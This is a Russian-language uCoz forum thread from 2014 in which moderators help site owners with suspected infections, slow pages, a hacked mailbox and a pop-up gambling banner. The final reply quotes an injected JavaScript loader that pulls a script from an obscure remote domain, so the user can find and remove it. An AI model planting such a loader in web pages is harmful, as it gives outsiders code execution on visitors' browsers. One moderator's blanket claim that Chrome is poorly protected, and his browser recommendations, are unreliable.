Модератор форума: Yuri_G |
Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (предотвращение, диагностика) |
Вирусы на сайтах |
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
123454892, вы вообще о чем? как вы набираете в поисковике свой сайт и как это связано с вирусами на сайте? вы понимаете где пишете? нету у вас сокрытия баннеров
|
Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка) : http://video-doza.ru и так на всех 2) проблема обнаруживается только под логином или под гостем тоже: и там и там 3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки: Подозрение на вирус! На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код. 4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки: сменил 3 браузера хром, мозила, нига выдаёт ошибку 403 постоянно. Искал причину удалял всё что может загружать сайт таким образом. Когда захожу на сайт начинаются жёсткие лаги. На других сайтах всё в порядке и раньше сидел на своём сайте всё было в порядке вот только недавно началось такое. Добавлено (04 Окт 2014, 09:14:46) Добавлено (04 Окт 2014, 09:21:56) Добавлено (04 Окт 2014, 10:07:14) Добавлено (04 Окт 2014, 10:11:12) Добавлено (04 Окт 2014, 10:12:01) |
Vovan4ik-333, Ваш сайт чистый, а то что он грузится очень долго - это уже ваши проблемы. В Исходном коде страницы (любой) там напихано кода просто море, очень сильно загружена страница изображениями, iframe-кодами (Видео из ВК), и ссылками на JS,CSS и т.д.
Советую очищать шаблоны он хлама |
Vovan4ik-333, ваш сайт был пробит по всем анти-вирусным базам 2 раза. Вирусов обнаружено не было.
А вот нагрузка лишними кодами, картинками, рекламой и анимациями идет большая. А так же много сторонних ресурсов как ВИДЕО ВК и ссылки на другие порталы. Модератор в отставке :D
|
Всё уже разобрался.
|
Почему выскакивает вредоносный код на который ругается Аваст? Вроде бы ничего такого не ставил,а только проверенные ссылки.
Вот к примеру сообщение которое мне написали: что-то вредоносное всё-таки есть. Результатом исследования стала незакрывающаяся вкладка с "просьбой обновить гугл хром" Не могу понять и найти такой код. Дкело в том что я использую Касперского и у меня такого ничего не происходит. В чем причина то??? Ссылка на страницу вот Сообщение отредактировал rem-31 - Воскресенье, 05 Окт 2014, 11:04:15
|
Почему выскакивает вредоносный код на который ругается Аваст? Вроде бы ничего такого не ставил,а только проверенные ссылки. Вот к примеру сообщение которое мне написали: что-то вредоносное всё-таки есть. Результатом исследования стала незакрывающаяся вкладка с "просьбой обновить гугл хром" Не могу понять и найти такой код. Дкело в том что я использую Касперского и у меня такого ничего не происходит. В чем причина то??? Предоставьте скриншот окошка антивируса "Угроза". Модератор в отставке :D
Сообщение отредактировал Хард - Воскресенье, 05 Окт 2014, 11:49:31
|
что-то вредоносное всё-таки есть. Результатом исследования стала незакрывающаяся вкладка с "просьбой обновить гугл хром" Это означает уже вирус в браузере, так как Google обновляется не автоматически и на оф.сайте по вашей инициативе. Результаты проверки: Вирусов не обнаружено Yandex относит данный сайт к безопасным Google относит данный сайт к безопасным Всё дело в браузере, Google Chrome очень плохо-защищенный браузер. Он вечно ловит вирусы переходя на разные сайты. Советую браузер Uran на базе Chromium или же Амиго. Uran только чуть отличается интерфейсом. Код Ссылка на скачку ниже. Модератор в отставке :D
Сообщение отредактировал Хард - Воскресенье, 05 Окт 2014, 12:13:35
|
Хард, Спасибо большое. Выяснилось что это один "клоун" решил таким образом пошутить ...
|
И снова взломщики - когда ж хакеры вымрут.
30.09. был взломан мой ящик на яндексе, через него придурки получили доступ к моему сайту http://jon-vlasov.narod.ru/ и видимо заразили его (касперский нашел остатки вирусов в ящике). Теперь сайт не открывается ни на одной странице. Какому дизпенышу мой сайт приглянулся? ВОПРОС: uCoz собрал народников что бы получить тренировочную базу вредоносников? И, как мои пороли попали хакрюшам? |
jon-vlasov, сайт прекрасно открывается. все выборочные страницы работают. на сервисе юкоз нигде не используется пароль от вашей почты. если вы везде ставите одинаковый пароль, то это уже проблемы вашей безопасности
а теперь описываем проблему четко и ясно без многобукав сайт не открывается вообще? вместо сайта белый листик или идет перенаправление на другие сайты? |
Спасибо Webanet, само собой восстановилось!?
Была ситуация, что открывалось сообщение "Не удается отобразить эту страницу" при попытки зайти на любую страницу через поисковик яндекса или напрямую с Избранного. |
Добрый День, заметил что примерно раз в сутки появляется баннер на моём сайте http://penza-remont.ucoz.ru/ , попробовал зайти с разных браузеров и во всех случаях при первом заходе выскакивает данный баннер, в последующие разы уже нет. Ссылка при переходе по баннеру http://slot-portal.com/land/14/?id=G0jJMtKi&banner_id=2475&p1=139011 . Помогите пожалуйста !!!
Прикрепления:
6793491.jpg
(249.7 Kb)
|
Darik9611, из блока календарь удалите скрипт
Код <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://fwrotptcwoot.seem-to-follow.info' + '/?816787=567n4bXx__zw-Pr34K6ipqGrpaA'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script> удалять придется через редактирование глобальных блоков |
| |||